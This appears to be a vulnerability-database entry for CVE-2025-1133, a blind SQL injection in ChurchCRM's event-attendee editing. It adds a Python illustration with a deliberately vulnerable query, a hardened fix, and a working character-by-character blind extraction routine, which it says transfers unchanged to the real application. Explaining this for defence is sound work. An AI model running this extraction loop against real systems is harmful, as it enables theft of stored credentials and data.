CVE-2025-1133
Published: 19 February 2025
Description
Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.
Security Summary
CVE-2025-1133 is a boolean-based blind SQL injection vulnerability affecting ChurchCRM versions 5.13.0 and prior. The issue exists in the EditEventAttendees functionality, where the EID parameter is concatenated directly into an SQL query without validation or parameterization, allowing an attacker to inject arbitrary SQL and infer query results from differences in the application's response.
Exploitation requires an authenticated Administrator account; it can be performed over the network with low attack complexity and no user interaction. A successful attack allows data exfiltration, modification, or deletion, with high impact on confidentiality, integrity, and availability, as reflected in the CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
Mitigation details are available in the referenced advisory at https://github.com/ChurchCRM/CRM/issues/7252.
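The following is an added, self-contained illustration of the flaw class and of how a boolean-based blind oracle is turned into data extraction; it is not ChurchCRM's code and not taken from the advisory. ChurchCRM is a PHP/MySQL application, so this Python/SQLite stand-in only mirrors the pattern: the table and column names (events_event, user_usr, usr_secret), the function names, and the stored values are all constructed for the example. vulnerable_lookup() concatenates the EID parameter the way the advisory describes; fixed_lookup() shows the corresponding hardening (type check plus bound parameter); blind_extract() recovers a string one character at a time using only the yes/no signal the vulnerable handler leaks.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the application database (invented schema)."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE events_event (event_id INTEGER PRIMARY KEY, title TEXT)")
    cur.execute("CREATE TABLE user_usr (usr_id INTEGER PRIMARY KEY, usr_name TEXT, usr_secret TEXT)")
    cur.executemany("INSERT INTO events_event VALUES (?, ?)",
                    [(1, "Sunday service"), (2, "Choir practice")])
    cur.executemany("INSERT INTO user_usr VALUES (?, ?, ?)",
                    [(1, "admin", "s3cr3t")])
    conn.commit()
    return conn


def vulnerable_lookup(conn, eid):
    """Mirrors the reported flaw: EID is concatenated into the query unquoted.

    The only thing an attacker observes is whether the page renders an event
    (row found) or not, which is exactly the boolean signal blind SQLi needs.
    """
    sql = "SELECT title FROM events_event WHERE event_id = " + str(eid)
    return conn.execute(sql).fetchone() is not None


def fixed_lookup(conn, eid):
    """Hardened form: reject non-integer input, then bind the value as a parameter."""
    if not isinstance(eid, int):
        raise ValueError("EID must be an integer")
    row = conn.execute("SELECT title FROM events_event WHERE event_id = ?", (eid,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery, max_len=32):
    """Boolean-based blind extraction of the scalar returned by `subquery`.

    `oracle(payload)` must return True when the injected condition holds.
    Each character is found by binary search over printable ASCII (32..126),
    costing about seven oracle calls per character plus one length probe.
    """
    result = ""
    for pos in range(1, max_len + 1):
        # Stop when the string has no character at this position.
        if not oracle(f"1 AND LENGTH(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND UNICODE(SUBSTR(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def demo():
    """Recover the constructed secret through the vulnerable handler only."""
    conn = build_db()
    oracle = lambda payload: vulnerable_lookup(conn, payload)
    return blind_extract(oracle, "SELECT usr_secret FROM user_usr WHERE usr_name = 'admin'")


def hardened_rejects_payload():
    """Show that the same payload cannot reach the query in the hardened handler."""
    conn = build_db()
    try:
        fixed_lookup(conn, "1 AND 1=1")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("extracted via blind oracle:", demo())
    print("hardened handler rejects payload:", hardened_rejects_payload())
```

Against the real application the oracle is the HTTP response for EditEventAttendees (attendee list rendered or not) rather than a function return value, and the extraction loop is otherwise unchanged, which is why a "boolean-based" finding rated with PR:H still carries C:H. The fix transfers directly: in PHP, cast EID to int or bind it through a prepared statement before it touches the query.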
Details
CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The SQL injection vulnerability in ChurchCRM, reachable by an authenticated Administrator, enables arbitrary SQL execution against the application database, facilitating collection of data from the database (T1213.006), stored data manipulation via UPDATE/INSERT statements (T1565.001), and data destruction via DELETE statements (T1485).